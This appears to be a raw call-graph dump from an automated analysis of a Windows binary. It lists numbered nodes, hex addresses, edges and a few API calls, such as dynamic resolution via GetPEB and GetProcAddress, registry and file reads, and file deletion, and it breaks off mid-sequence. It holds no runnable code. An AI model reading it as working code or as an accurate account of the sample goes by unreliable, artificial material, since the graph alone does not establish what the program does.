8702 4070ff 6 API calls 8701->8702 8702->8697 8703 407055 6 API calls 8704 412742 8703->8704 8704->8701 8705 40719a 6 API calls 8704->8705 8706 41276e 8705->8706 8707 412804 8706->8707 8833 406f4a 8706->8833 8861 4070ff 8707->8861 8710 41279a 8839 412553 8710->8839 8883 405907 8720->8883 8722 405a61 8723 405a76 8722->8723 8724 405907 4 API calls 8722->8724 8723->8539 8724->8722 8726 402b7c 2 API calls 8725->8726 8728 405a99 8726->8728 8729 405ade 8728->8729 8886 40595e 8728->8886 8729->8557 8758 4076a8 8730->8758 8732 406913 8733 406a61 8732->8733 8734 40771e 6 API calls 8732->8734 8733->8673 8738 406949 8734->8738 8735 40771e 6 API calls 8735->8738 8736 404678 4 API calls 8736->8738 8738->8733 8738->8735 8738->8736 8764 4046c2 8738->8764 8740 4031e5 4 API calls 8739->8740 8741 4068a6 8740->8741 8741->8673 8743 4046b4 8742->8743 8744 4046a4 8742->8744 8743->8671 8746 404678 8743->8746 8745 4031e5 4 API calls 8744->8745 8745->8743 8747 4031e5 4 API calls 8746->8747 8748 40468b 8747->8748 8748->8671 8749 40771e 8748->8749 8750 407737 8749->8750 8754 407748 8749->8754 8751 407644 6 API calls 8750->8751 8752 407741 8751->8752 8753 406baa 6 API calls 8752->8753 8753->8754 8754->8682 8756 4031e5 4 API calls 8755->8756 8757 4068c2 8756->8757 8757->8689 8759 4076c1 8758->8759 8763 4076d2 8758->8763 8772 407644 8759->8772 8763->8732 8765 4046d3 8764->8765 8766 4046d9 8764->8766 8807 40464c 8765->8807 8768 404678 4 API calls 8766->8768 8771 4046e9 8766->8771 8768->8771 8769 40469b 4 API calls 8770 404714 8769->8770 8770->8738 8771->8769 8771->8770 8773 407653 8772->8773 8775 407661 8772->8775 8773->8775 8780 406a6b 8773->8780 8776 406baa 8775->8776 8777 406bbb 8776->8777 8779 406bc8 8776->8779 8777->8779 8788 407402 8777->8788 8779->8763 8784 406a81 8780->8784 8781 402b7c 2 API calls 8781->8784 8782 406b8b 8782->8775 8783 406894 4 API calls 8783->8784 8784->8781 8784->8782 8784->8783 8785 406b96 8784->8785 8786 402bab 2 API calls 8784->8786 8787 402bab 2 API calls 8785->8787 8786->8784 8787->8782 8789 407644 6 API calls 8788->8789 8790 407412 8789->8790 8791 402b7c 2 API calls 8790->8791 8798 407450 8790->8798 8792 407483 8791->8792 8793 402b7c 2 API calls 8792->8793 8792->8798 8796 4074ce 8793->8796 8794 4074da 8795 4068cc 2 API calls 8794->8795 8795->8798 8796->8794 8797 402b7c 2 API calls 8796->8797 8801 40751f 8797->8801 8798->8779 8799 40752b 8800 4068cc 2 API calls 8799->8800 8800->8794 8801->8799 8803 4068cc 8801->8803 8804 4068d6 8803->8804 8805 4068e3 8803->8805 8804->8805 8806 402bab GetProcessHeap HeapFree 8804->8806 8805->8799 8806->8805 8808 404666 8807->8808 8809 404659 8807->8809 8808->8766 8810 4031e5 4 API calls 8809->8810 8810->8808 8812 4047e6 5 API calls 8811->8812 8813 404897 8812->8813 8814 40489c 8813->8814 8869 4047c7 8813->8869 8814->8692 8818 40706f 8817->8818 8819 407084 8817->8819 8818->8819 8820 407644 6 API calls 8818->8820 8824 4070e4 8819->8824 8872 406fd2 8819->8872 8821 40707d 8820->8821 8823 406baa 6 API calls 8821->8823 8823->8819 8824->8697 8825 40719a 8824->8825 8826 4071b0 8825->8826 8830 4071c5 8825->8830 8827 407644 6 API calls 8826->8827 8826->8830 8828 4071be 8827->8828 8829 406baa 6 API calls 8828->8829 8829->8830 8831 406fd2 4 API calls 8830->8831 8832 407226 8830->8832 8831->8832 8832->8701 8832->8703 8834 406f75 8833->8834 8835 406f64 8833->8835 8834->8710 8836 407644 6 API calls 8835->8836 8837 406f6e 8836->8837 8838 406baa 6 API calls 8837->8838 8838->8834 8880 4060ac 8839->8880 8862 407116 8861->8862 8863 40712b 8861->8863 8862->8863 8864 407644 6 API calls 8862->8864 8866 406fd2 4 API calls 8863->8866 8868 407187 8863->8868 8865 407124 8864->8865 8867 406baa 6 API calls 8865->8867 8866->8868 8867->8863 8868->8701 8870 4031e5 4 API calls 8869->8870 8871 4047d9 8870->8871 8871->8692 8873 406fde 8872->8873 8874 407027 8873->8874 8875 4031e5 4 API calls 8873->8875 8874->8824 8876 406ffa 8875->8876 8877 4031e5 4 API calls 8876->8877 8878 407011 8877->8878 8879 4031e5 4 API calls 8878->8879 8879->8874 8881 4031e5 4 API calls 8880->8881 8882 4060bb 8881->8882 8882->8882 8884 4031e5 4 API calls 8883->8884 8885 40591a 8884->8885 8885->8722 8887 4031e5 4 API calls 8886->8887 8888 405971 8887->8888 8888->8728 8890 4031e5 4 API calls 8889->8890 8891 4059ed 8890->8891 8892 405a38 8891->8892 8893 402b7c 2 API calls 8891->8893 8892->8636 8894 405a16 8893->8894 8894->8892 8895 4031e5 4 API calls 8894->8895 8895->8892 8897 4031e5 4 API calls 8896->8897 8898 4044b9 8897->8898 8898->8497 9818 40a349 9819 4098a7 13 API calls 9818->9819 9820 40a359 9819->9820 9057 408952 9078 40823f 9057->9078 9060 408960 9062 4056bf 2 API calls 9060->9062 9063 40896a 9062->9063 9106 408862 9063->9106 9065 413aca 4 API calls 9066 4089d4 9065->9066 9068 405695 2 API calls 9066->9068 9067 408975 9075 4089c4 9067->9075 9114 4087d6 9067->9114 9070 4089df 9068->9070 9075->9065 9076 402bab 2 API calls 9077 40899d 9076->9077 9077->9075 9077->9076 9079 40824d 9078->9079 9080 40831b 9079->9080 9081 4031e5 4 API calls 9079->9081 9080->9060 9094 4083bb 9080->9094 9082 40826d 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 408289 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082a5 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082c1 9087->9088 9089 4031e5 4 API calls 9088->9089 9090 4082e2 9089->9090 9091 4031e5 4 API calls 9090->9091 9092 4082ff 9091->9092 9093 4031e5 4 API calls 9092->9093 9093->9080 9142 408363 9094->9142 9097 4056bf 2 API calls 9103 4083f4 9097->9103 9098 408492 9099 413aca 4 API calls 9098->9099 9100 4084a0 9099->9100 9101 405695 2 API calls 9100->9101 9102 4084ab 9101->9102 9102->9060 9103->9098 9145 40815d 9103->9145 9160 40805d 9103->9160 9175 404b8f 9106->9175 9108 408946 9108->9067 9109 40887e 9109->9108 9110 4031e5 4 API calls 9109->9110 9111 40893e 9109->9111 9113 402b7c 2 API calls 9109->9113 9110->9109 9178 404a39 9111->9178 9113->9109 9115 402b7c 2 API calls 9114->9115 9116 4087e7 9115->9116 9117 40885a 9116->9117 9118 4031e5 4 API calls 9116->9118 9126 408749 9117->9126 9120 408802 9118->9120 9119 408853 9121 402bab 2 API calls 9119->9121 9120->9119 9123 40884d 9120->9123 9187 408522 9120->9187 9191 4084b4 9120->9191 9121->9117 9194 4084d4 9123->9194 9127 404b8f 5 API calls 9126->9127 9129 408765 9127->9129 9128 4031e5 4 API calls 9128->9129 9129->9128 9130 408522 4 API calls 9129->9130 9131 4087c7 9129->9131 9133 4087cf 9129->9133 9130->9129 9132 404a39 5 API calls 9131->9132 9132->9133 9134 4085d1 9133->9134 9136 4086c2 9134->9136 9140 4085e9 9134->9140 9136->9077 9137 402bab 2 API calls 9137->9140 9138 4031e5 4 API calls 9138->9140 9140->9136 9140->9137 9140->9138 9200 4089e6 9140->9200 9219 4086c9 9140->9219 9223 4036a3 9140->9223 9143 4031e5 4 API calls 9142->9143 9144 408386 9143->9144 9144->9097 9144->9102 9146 40816f 9145->9146 9147 4081b6 9146->9147 9148 4081fd 9146->9148 9159 4081ef 9146->9159 9150 405872 4 API calls 9147->9150 9149 405872 4 API calls 9148->9149 9152 408213 9149->9152 9151 4081cf 9150->9151 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9155 4081df 9153->9155 9156 408222 9154->9156 9157 405872 4 API calls 9155->9157 9158 405872 4 API calls 9156->9158 9157->9159 9158->9159 9159->9103 9161 40808c 9160->9161 9162 4080d2 9161->9162 9163 408119 9161->9163 9174 40810b 9161->9174 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 40812f 9164->9166 9167 4080eb 9165->9167 9169 405872 4 API calls 9166->9169 9168 405872 4 API calls 9167->9168 9170 4080fb 9168->9170 9171 40813e 9169->9171 9172 405872 4 API calls 9170->9172 9173 405872 4 API calls 9171->9173 9172->9174 9173->9174 9174->9103 9181 404a19 9175->9181 9177 404ba0 9177->9109 9184 4049ff 9178->9184 9180 404a44 9180->9108 9182 4031e5 4 API calls 9181->9182 9183 404a2c RegOpenKeyW 9182->9183 9183->9177 9185 4031e5 4 API calls 9184->9185 9186 404a12 RegCloseKey 9185->9186 9186->9180 9189 408534 9187->9189 9188 4085af 9188->9120 9189->9188 9197 4084ee 9189->9197 9192 4031e5 4 API calls 9191->9192 9193 4084c7 9192->9193 9193->9120 9195 4031e5 4 API calls 9194->9195 9196 4084e7 9195->9196 9196->9119 9198 4031e5 4 API calls 9197->9198 9199 408501 9198->9199 9199->9188 9201 4031e5 4 API calls 9200->9201 9202 408a06 9201->9202 9203 408b21 9202->9203 9204 4031e5 4 API calls 9202->9204 9203->9140 9206 408a32 9204->9206 9205 408b17 9235 403649 9205->9235 9206->9205 9226 403666 9206->9226 9210 4031e5 4 API calls 9212 408a88 9210->9212 9213 4031e5 4 API calls 9212->9213 9218 408b0e 9212->9218 9214 408ac4 9213->9214 9215 405b6f 6 API calls 9214->9215 9216 408aff 9215->9216 9216->9218 9229 408508 9216->9229 9232 40362f 9218->9232 9220 4086e2 9219->9220 9221 408744 9219->9221 9220->9221 9222 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9220->9222 9221->9140 9222->9220 9224 4031e5 4 API calls 9223->9224 9225 4036b5 9224->9225 9225->9140 9227 4031e5 4 API calls 9226->9227 9228 403679 9227->9228 9228->9210 9228->9218 9230 4031e5 4 API calls 9229->9230 9231 40851b 9230->9231 9231->9218 9233 4031e5 4 API calls 9232->9233 9234 403642 9233->9234 9234->9205 9236 4031e5 4 API calls 9235->9236 9237 40365c 9236->9237 9237->9203 9838 40f252 9839 404bee 6 API calls 9838->9839 9840 40f269 9839->9840 9841 404bee 6 API calls 9840->9841 9852 40f2ff 9840->9852 9842 40f282 9841->9842 9843 404bee 6 API calls 9842->9843 9844 40f290 9843->9844 9855 404c4e 9844->9855 9846 40f2a7 9847 405872 4 API calls 9846->9847 9846->9852 9848 40f2cd 9847->9848 9849 405872 4 API calls 9848->9849 9850 40f2dc 9849->9850 9851 405872 4 API calls 9850->9851 9853 40f2ee 9851->9853 9854 405762 4 API calls 9853->9854 9854->9852 9856 402b7c 2 API calls 9855->9856 9858 404c60 9856->9858 9857 404ca4 9857->9846 9858->9857 9859 4031e5 4 API calls 9858->9859 9860 404c8d 9859->9860 9860->9857 9861 402bab 2 API calls 9860->9861 9861->9857 9862 41045c 9863 4040bb 12 API calls 9862->9863 9864 410477 9863->9864 9865 41060b 9864->9865 9893 407851 9864->9893 9867 41048f 9869 407851 2 API calls 9867->9869 9873 410604 9867->9873 9868 403f9e 5 API calls 9868->9865 9870 4104a9 9869->9870 9875 4105e0 9870->9875 9876 405ae9 6 API calls 9870->9876 9878 41056f 9870->9878 9879 4105eb 9870->9879 9871 402bab 2 API calls 9871->9873 9872 402bab 2 API calls 9874 4105fb 9872->9874 9873->9868 9874->9871 9877 402bab 2 API calls 9875->9877 9875->9879 9876->9870 9877->9879 9878->9875 9880 4105d6 9878->9880 9882 412269 6 API calls 9878->9882 9879->9872 9879->9874 9881 402bab 2 API calls 9880->9881 9881->9875 9883 410580 9882->9883 9883->9880 9884 405872 4 API calls 9883->9884 9885 410599 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105a9 9886->9887 9888 405872 4 API calls 9887->9888 9889 4105bb 9888->9889 9890 405872 4 API calls 9889->9890 9891 4105cd 9890->9891 9892 402bab 2 API calls 9891->9892 9892->9880 9894 407866 9893->9894 9895 402b7c 2 API calls 9894->9895 9896 407899 9894->9896 9895->9896 9896->9867 9299 40f561 9302 40f4b6 9299->9302 9303 413b28 6 API calls 9302->9303 9308 40f4bf 9303->9308 9304 405b6f 6 API calls 9304->9308 9305 402bab GetProcessHeap HeapFree 9305->9308 9306 413a58 13 API calls 9306->9308 9307 40f559 9308->9304 9308->9305 9308->9306 9308->9307 9312 403b64 9313 4031e5 4 API calls 9312->9313 9314 403b77 PathFileExistsW 9313->9314 9928 40d069 9929 404bee 6 API calls 9928->9929 9930 40d080 9929->9930 9931 404bee 6 API calls 9930->9931 9952 40d1e2 9930->9952 9932 40d099 9931->9932 9933 404bee 6 API calls 9932->9933 9934 40d0a7 9933->9934 9969 404ba7 9934->9969 9937 404bee 6 API calls 9938 40d0c5 9937->9938 9939 404c4e 6 API calls 9938->9939 9940 40d0dc 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d0eb 9941->9942 9943 404ba7 4 API calls 9942->9943 9944 40d0fa 9943->9944 9945 404bee 6 API calls 9944->9945 9946 40d109 9945->9946 9947 404c4e 6 API calls 9946->9947 9948 40d123 9947->9948 9949 405872 4 API calls 9948->9949 9948->9952 9950 40d14a 9949->9950 9951 405872 4 API calls 9950->9951 9953 40d159 9951->9953 9954 405872 4 API calls 9953->9954 9955 40d16b 9954->9955 9956 405781 4 API calls 9955->9956 9957 40d179 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d18b 9958->9959 9960 405762 4 API calls 9959->9960 9961 40d19f 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1b1 9962->9963 9964 405781 4 API calls 9963->9964 9965 40d1bf 9964->9965 9966 405872 4 API calls 9965->9966 9967 40d1d1 9966->9967 9968 405762 4 API calls 9967->9968 9968->9952 9970 4031e5 4 API calls 9969->9970 9971 404bca 9970->9971 9971->9937 9341 40f16e 9342 4056bf 2 API calls 9341->9342 9343 40f17b 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f19e 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1b6 9346->9347 9348 412093 20 API calls 9347->9348 9349 40f1cc 9348->9349 9350 412093 20 API calls 9349->9350 9351 40f1e2 9350->9351 9352 413aca 4 API calls 9351->9352 9353 40f1ef 9352->9353 9354 405695 2 API calls 9353->9354 9355 40f1fa 9354->9355 9356 40ce71 9357 413b28 6 API calls 9356->9357 9358 40ce78 9357->9358 9359 405b6f 6 API calls 9358->9359 9362 40ce83 9359->9362 9360 403fbf 7 API calls 9361 40cecc 9360->9361 9364 40cefb 9361->9364 9367 403d74 19 API calls 9361->9367 9363 40ceba 9362->9363 9365 403d74 19 API calls 9362->9365 9369 40cec1 9362->9369 9366 402bab 2 API calls 9363->9366 9368 40cead 9365->9368 9366->9369 9370 40cee7 9367->9370 9368->9363 9374 402bab 2 API calls 9368->9374 9369->9360 9371 40cef4 9370->9371 9372 402bab 2 API calls 9370->9372 9373 402bab 2 API calls 9371->9373 9372->9371 9373->9364 9374->9363 9375 406472 9376 4031e5 4 API calls 9375->9376 9377 406484 Sleep 9376->9377 10045 40f204 10046 405781 4 API calls 10045->10046 10047 40f214 10046->10047 10048 4057df 13 API calls 10047->10048 10049 40f226 10048->10049 9435 403c08 9436 4031e5 4 API calls 9435->9436 9437 403c1a DeleteFileW 9436->9437 9438 410a09 9439 41219c 14 API calls 9438->9439 9440 410a1b 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a23 9441->9442 9443 41219c 14 API calls 9442->9443 9444 410a2c 9443->9444 9445 41219c 14 API calls 9444->9445 9446 410a38 9445->9446 9447 404b22 6 API calls 9446->9447 9448 410a4c 9447->9448 9449 410a7a 9448->9449 9450 403fbf 7 API calls 9448->9450 9451 410a5c 9450->9451 9452 410a71 9451->9452 9453 413a58 13 API calls 9451->9453 9454 402bab 2 API calls 9452->9454 9455 410a6b 9453->9455 9454->9449 9456 402bab 2 API calls 9455->9456 9456->9452 10050 410d09 10051 410d56 10050->10051 10052 410d17 10050->10052 10054 413a58 13 API calls 10051->10054 10066 406642 10052->10066 10056 410d6f 10054->10056 10057 4056bf 2 API calls 10058 410d2e 10057->10058 10079 405641 10058->10079 10060 410d41 10061 413aca 4 API calls 10060->10061 10062 410d4a 10061->10062 10063 405695 2 API calls 10062->10063 10064 410d50 10063->10064 10065 4036a3 4 API calls 10064->10065 10065->10051 10067 406662 10066->10067 10068 4031e5 4 API calls 10067->10068 10069 406676 10068->10069 10083 4066bf 10069->10083 10074 4066b1 10076 4036a3 4 API calls 10074->10076 10075 4066a7 10077 4036a3 4 API calls 10075->10077 10078 4066ac 10076->10078 10077->10078 10078->10051 10078->10057 10080 405673 10079->10080 10081 40564d 10079->10081 10080->10060 10081->10080 10082 4056fc 4 API calls 10081->10082 10082->10080 10084 4031e5 4 API calls 10083->10084 10085 4066dc 10084->10085 10086 4066f6 SetLastError 10085->10086 10087 406708 GetLastError 10085->10087 10098 406693 10086->10098 10088 406713 10087->10088 10087->10098 10089 4031e5 4 API calls 10088->10089 10090 406725 10089->10090 10091 4031e5 4 API calls 10090->10091 10090->10098 10092 40673f 10091->10092 10093 406753 10092->10093 10094 406749 10092->10094 10095 4031e5 4 API calls 10093->10095 10096 4036a3 4 API calls 10094->10096 10097 406761 10095->10097 10096->10098 10099 40678a 10097->10099 10100 40677c 10097->10100 10105 406455 10098->10105 10102 4036a3 4 API calls 10099->10102 10101 4036a3 4 API calls 10100->10101 10103 406781 10101->10103 10102->10098 10104 4036a3 4 API calls 10103->10104 10104->10098 10106 4031e5 4 API calls 10105->10106 10107 406468 10106->10107 10107->10074 10107->10075 9457 40c509 9458 412093 20 API calls 9457->9458 9459 40c51e 9458->9459 9466 40910d 9467 404b22 6 API calls 9466->9467 9468 409124 9467->9468 9469 40917a 9468->9469 9470 405b6f 6 API calls 9468->9470 9471 40913e 9470->9471 9473 404b22 6 API calls 9471->9473 9478 409173 9471->9478 9472 402bab 2 API calls 9472->9469 9474 409153 9473->9474 9475 40916a 9474->9475 9477 409408 15 API calls 9474->9477 9476 402bab 2 API calls 9475->9476 9476->9478 9479 409164 9477->9479 9478->9472 9480 402bab 2 API calls 9479->9480 9480->9475 9484 410410 9485 4056bf 2 API calls 9484->9485 9486 41041b 9485->9486 9487 412093 20 API calls 9486->9487 9488 41043c 9487->9488 9489 413aca 4 API calls 9488->9489 9490 410449 9489->9490 9491 405695 2 API calls 9490->9491 9492 410454 9491->9492 9519 40c71a 9520 41219c 14 API calls 9519->9520 9521 40c728 9520->9521 10163 410b1a 10164 404bee 6 API calls 10163->10164 10165 410b31 10164->10165 10166 404bee 6 API calls 10165->10166 10192 410c6d 10165->10192 10167 410b5a 10166->10167 10168 404bee 6 API calls 10167->10168 10169 410b69 10168->10169 10170 404bee 6 API calls 10169->10170 10171 410b78 10170->10171 10172 404ba7 4 API calls 10171->10172 10173 410b86 10172->10173 10174 404ba7 4 API calls 10173->10174 10175 410b95 10174->10175 10176 405872 4 API calls 10175->10176 10175->10192 10177 410bd7 10176->10177 10178 405872 4 API calls 10177->10178 10179 410be8 10178->10179 10180 405872 4 API calls 10179->10180 10181 410bf9 10180->10181 10182 405781 4 API calls 10181->10182 10183 410c07 10182->10183 10184 405781 4 API calls 10183->10184 10188 410c15 10184->10188 10185 410c4e 10186 405762 4 API calls 10185->10186 10187 410c60 10186->10187 10190 403f9e 5 API calls 10187->10190 10187->10192 10188->10185 10196 405e5a 10188->10196 10190->10192 10193 4040bb 12 API calls 10194 410c44 10193->10194 10195 402bab 2 API calls 10194->10195 10195->10185 10197 402b7c 2 API calls 10196->10197 10199 405e72 10197->10199 10198 405ea3 10198->10185 10198->10193 10199->10198 10200 4031e5 4 API calls 10199->10200 10201 405e94 10200->10201 10201->10198 10202 402bab 2 API calls 10201->10202 10202->10198 10203 40f81c 10204 404bee 6 API calls 10203->10204 10205 40f833 10204->10205 10206 404bee 6 API calls 10205->10206 10220 40f94f 10205->10220 10207 40f85c 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f86b 10208->10209 10210 404bee 6 API calls 10209->10210 10211 40f87a 10210->10211 10212 404bee 6 API calls 10211->10212 10213 40f888 10212->10213 10214 404ba7 4 API calls 10213->10214 10215 40f897 10214->10215 10216 405872 4 API calls 10215->10216 10215->10220 10217 40f8d8 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f8ea 10218->10219 10221 405872 4 API calls 10219->10221 10222 40f8fa 10221->10222 10223 405872 4 API calls 10222->10223 10224 40f90c 10223->10224 10225 405781 4 API calls 10224->10225 10226 40f91d 10225->10226 10227 4040bb 12 API calls 10226->10227 10228 40f92d 10227->10228 10229 405762 4 API calls 10228->10229 10230 40f93f 10229->10230 10230->10220 10231 403f9e 5 API calls 10230->10231 10231->10220 9534 402c1f 9535 4031e5 4 API calls 9534->9535 9536 402c31 LoadLibraryW 9535->9536 10241 407e1f 10242 407e2c 10241->10242 10249 407e61 10241->10249 10244 407e3e 10242->10244 10247 402bab 2 API calls 10242->10247 10250 407e51 10242->10250 10243 407ea6 10245 407eb6 10243->10245 10248 402bab 2 API calls 10243->10248 10246 407ed4 10244->10246 10251 402bab 2 API calls 10244->10251 10245->10250 10252 402bab 2 API calls 10245->10252 10247->10244 10248->10245 10249->10243 10249->10245 10253 405872 4 API calls 10249->10253 10250->10246 10254 402bab 2 API calls 10250->10254 10251->10250 10252->10250 10255 407e86 10253->10255 10254->10246 10256 405872 4 API calls 10255->10256 10257 407e96 10256->10257 10258 405872 4 API calls 10257->10258 10258->10243 9549 405924 9550 4031e5 4 API calls 9549->9550 9551 405937 StrStrW 9550->9551 10267 410927 10268 4044ee 7 API calls 10267->10268 10269 41093d 10268->10269 10270 4109a4 10269->10270 10271 4056bf 2 API calls 10269->10271 10274 410954 10271->10274 10272 4044ee 7 API calls 10272->10274 10274->10272 10275 402bab 2 API calls 10274->10275 10276 410990 10274->10276 10282 41080e 10274->10282 10275->10274 10277 413aca 4 API calls 10276->10277 10278 410998 10277->10278 10279 405695 2 API calls 10278->10279 10280 41099e 10279->10280 10281 402bab 2 API calls 10280->10281 10281->10270 10283 410821 10282->10283 10293 41091f 10283->10293 10294 410701 10283->10294 10286 405872 4 API calls 10287 410900 10286->10287 10288 405872 4 API calls 10287->10288 10289 41090d 10288->10289 10290 405872 4 API calls 10289->10290 10291 410919 10290->10291 10292 402bab 2 API calls 10291->10292 10292->10293 10293->10274 10295 405f08 4 API calls 10294->10295 10297 410713 10295->10297 10296 410804 10296->10286 10296->10293 10297->10296 10298 402b7c 2 API calls 10297->10298 10299 410748 10298->10299 10301 402b7c 2 API calls 10299->10301 10303 4107fd 10299->10303 10300 402bab 2 API calls 10300->10296 10304 4107ad 10301->10304 10302 402bab 2 API calls 10302->10303 10303->10300 10304->10302 10305 40d726 10306 404bee 6 API calls 10305->10306 10307 40d73f 10306->10307 10308 40db63 10307->10308 10309 405872 4 API calls 10307->10309 10312 40d761 10309->10312 10310 404bee 6 API calls 10310->10312 10311 405872 4 API calls 10311->10312 10312->10310 10312->10311 10314 40d971 10312->10314 10313 404ba7 4 API calls 10313->10314 10314->10313 10315 405781 4 API calls 10314->10315 10319 40d9bb 10314->10319 10315->10314 10316 404c4e 6 API calls 10316->10319 10317 405781 4 API calls 10317->10319 10318 4037be 4 API calls 10318->10319 10319->10308 10319->10316 10319->10317 10319->10318 10320 405872 4 API calls 10319->10320 10320->10319 9607 40f12f 9608 41219c 14 API calls 9607->9608 9609 40f13f 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f14c 9610->9611 9612 41219c 14 API calls 9611->9612 9613 40f159 9612->9613 9614 41219c 14 API calls 9613->9614 9615 40f166 9614->9615 9622 40ed35 9623 4056bf 2 API calls 9622->9623 9624 40ed42 9623->9624 9625 412093 20 API calls 9624->9625 9626 40ed63 9625->9626 9627 412093 20 API calls 9626->9627 9628 40ed73 9627->9628 9629 413aca 4 API calls 9628->9629 9630 40ed80 9629->9630 9631 405695 2 API calls 9630->9631 9632 40ed8e 9631->9632 8076 40f3c5 8081 41219c 8076->8081 8079 41219c 14 API calls 8080 40f3e1 8079->8080 8082 4121b1 8081->8082 8097 40f3d3 8081->8097 8083 4121be 8082->8083 8087 4121c5 8082->8087 8129 413ba4 8083->8129 8085 4121ca 8099 404056 8085->8099 8087->8085 8091 412210 8087->8091 8088 4121c3 8088->8097 8106 405b6f 8088->8106 8091->8097 8134 403fbf 8091->8134 8092 41224d 8094 402bab 2 API calls 8092->8094 8092->8097 8094->8097 8097->8079 8145 402b7c GetProcessHeap RtlAllocateHeap 8099->8145 8101 404066 8103 404095 8101->8103 8147 4031e5 8101->8147 8103->8088 8105 402bab 2 API calls 8105->8103 8107 405b7d 8106->8107 8108 402b7c 2 API calls 8107->8108 8109 405b99 8108->8109 8110 405c02 8109->8110 8183 4059b8 8109->8183 8110->8092 8119 413a58 8110->8119 8112 405c09 8114 402bab 2 API calls 8112->8114 8113 405bba 8113->8112 8115 402b7c 2 API calls 8113->8115 8114->8110 8116 405bdd 8115->8116 8116->8112 8117 405be4 8116->8117 8118 402bab 2 API calls 8117->8118 8118->8110 8120 413a63 8119->8120 8128 412245 8119->8128 8120->8128 8186 405781 8120->8186 8123 405781 4 API calls 8124 413aa0 8123->8124 8189 4057df 8124->8189 8127 405781 4 API calls 8127->8128 8142 402bab 8128->8142 8130 413bad 8129->8130 8131 404056 6 API calls 8130->8131 8133 413bb8 8130->8133 8132 413bc5 8131->8132 8132->8088 8133->8088 8135 402b7c 2 API calls 8134->8135 8137 403fcf 8135->8137 8136 403ff4 8136->8088 8137->8136 8308 403b98 8137->8308 8140 403ff8 GetLastError 8141 402bab 2 API calls 8140->8141 8141->8136 8143 402bb4 GetProcessHeap HeapFree 8142->8143 8144 402bc6 8142->8144 8143->8144 8144->8092 8146 402b98 8145->8146 8146->8101 8148 4031f3 8147->8148 8149 403236 8147->8149 8148->8149 8152 403208 8148->8152 8158 4030a5 8149->8158 8151 403224 8154 403258 8151->8154 8156 4031e5 4 API calls 8151->8156 8164 403263 8152->8164 8154->8103 8154->8105 8155 40320d 8155->8154 8157 4030a5 4 API calls 8155->8157 8156->8154 8157->8151 8170 402ca4 8158->8170 8160 4030b0 8161 4030b5 8160->8161 8174 4030c4 8160->8174 8161->8151 8165 40326d 8164->8165 8166 402b7c 2 API calls 8165->8166 8169 4032b7 8165->8169 8167 40328c 8166->8167 8168 402b7c 2 API calls 8167->8168 8168->8169 8169->8155 8171 403079 8170->8171 8173 40307c 8171->8173 8178 40317b GetPEB 8171->8178 8173->8160 8177 4030eb 8174->8177 8175 4030c0 8175->8151 8177->8175 8180 402c03 8177->8180 8179 40319b 8178->8179 8179->8173 8181 4031e5 3 API calls 8180->8181 8182 402c15 GetProcAddress 8181->8182 8182->8175 8184 4031e5 4 API calls 8183->8184 8185 4059cb 8184->8185 8185->8113 8204 405797 8186->8204 8188 405792 8188->8123 8190 405832 8189->8190 8191 4057eb 8189->8191 8190->8127 8190->8128 8191->8190 8214 4040bb 8191->8214 8194 405839 8196 405853 8194->8196 8241 405627 8194->8241 8195 40582c 8238 403f9e 8195->8238 8252 405762 8196->8252 8203 403f9e 5 API calls 8203->8190 8205 4057a1 8204->8205 8206 4057bd 8204->8206 8205->8206 8208 4056fc 8205->8208 8206->8188 8209 405714 8208->8209 8210 402b7c 2 API calls 8209->8210 8211 405730 8210->8211 8212 402bab 2 API calls 8211->8212 8213 405752 8211->8213 8212->8213 8213->8206 8215 4031e5 4 API calls 8214->8215 8216 4040d5 CreateFileW 8215->8216 8217 4040f8 8216->8217 8218 40418d 8216->8218 8219 4031e5 4 API calls 8217->8219 8220 404183 8218->8220 8258 403c90 8218->8258 8226 404105 8219->8226 8220->8190 8220->8194 8220->8195 8224 40416d 8255 403c40 8224->8255 8226->8224 8230 4031e5 4 API calls 8226->8230 8228 4040bb 9 API calls 8231 4041c8 8228->8231 8229 402bab 2 API calls 8229->8220 8232 404131 VirtualAlloc 8230->8232 8231->8229 8232->8224 8233 404142 8232->8233 8234 4031e5 4 API calls 8233->8234 8235 40414f ReadFile 8234->8235 8235->8224 8236 404160 8235->8236 8237 4031e5 4 API calls 8236->8237 8237->8224 8239 4031e5 4 API calls 8238->8239 8240 403fb1 VirtualFree 8239->8240 8240->8190 8242 4031e5 4 API calls 8241->8242 8243 40563a 8242->8243 8244 405872 8243->8244 8246 405881 8244->8246 8245 4058bc 8247 405797 4 API calls 8245->8247 8249 4058af 8245->8249 8246->8245 8305 4058d4 8246->8305 8247->8249 8249->8196 8251 405781 4 API calls 8251->8245 8253 405781 4 API calls 8252->8253 8254 405770 8253->8254 8254->8203 8256 4031e5 4 API calls 8255->8256 8257 403c52 CloseHandle 8256->8257 8257->8220 8259 403ca3 8258->8259 8262 403caa 8258->8262 8285 405dc5 8259->8285 8261 404056 6 API calls 8263 403cbe 8261->8263 8262->8261 8264 403d3a 8262->8264 8265 403d2e 8263->8265 8266 403d17 8263->8266 8267 403ccf 8263->8267 8264->8220 8281 403c59 8264->8281 8265->8264 8269 402bab 2 API calls 8265->8269 8270 405b6f 6 API calls 8266->8270 8268 405b6f 6 API calls 8267->8268 8272 403cdd 8268->8272 8269->8264 8271 403d14 8270->8271 8274 402bab 2 API calls 8271->8274 8273 405b6f 6 API calls 8272->8273 8275 403cee 8273->8275 8274->8265 8275->8271 8290 403d4d 8275->8290 8278 403d0b 8280 402bab 2 API calls 8278->8280 8280->8271 8282 403c21 8281->8282 8283 4031e5 4 API calls 8282->8283 8284 403c33 8283->8284 8284->8228 8284->8231 8299 406799 8285->8299 8287 405dd5 8288 402b7c 2 API calls 8287->8288 8289 405dfe 8288->8289 8289->8262 8302 403bb7 8290->8302 8292 403cfe 8292->8278 8293 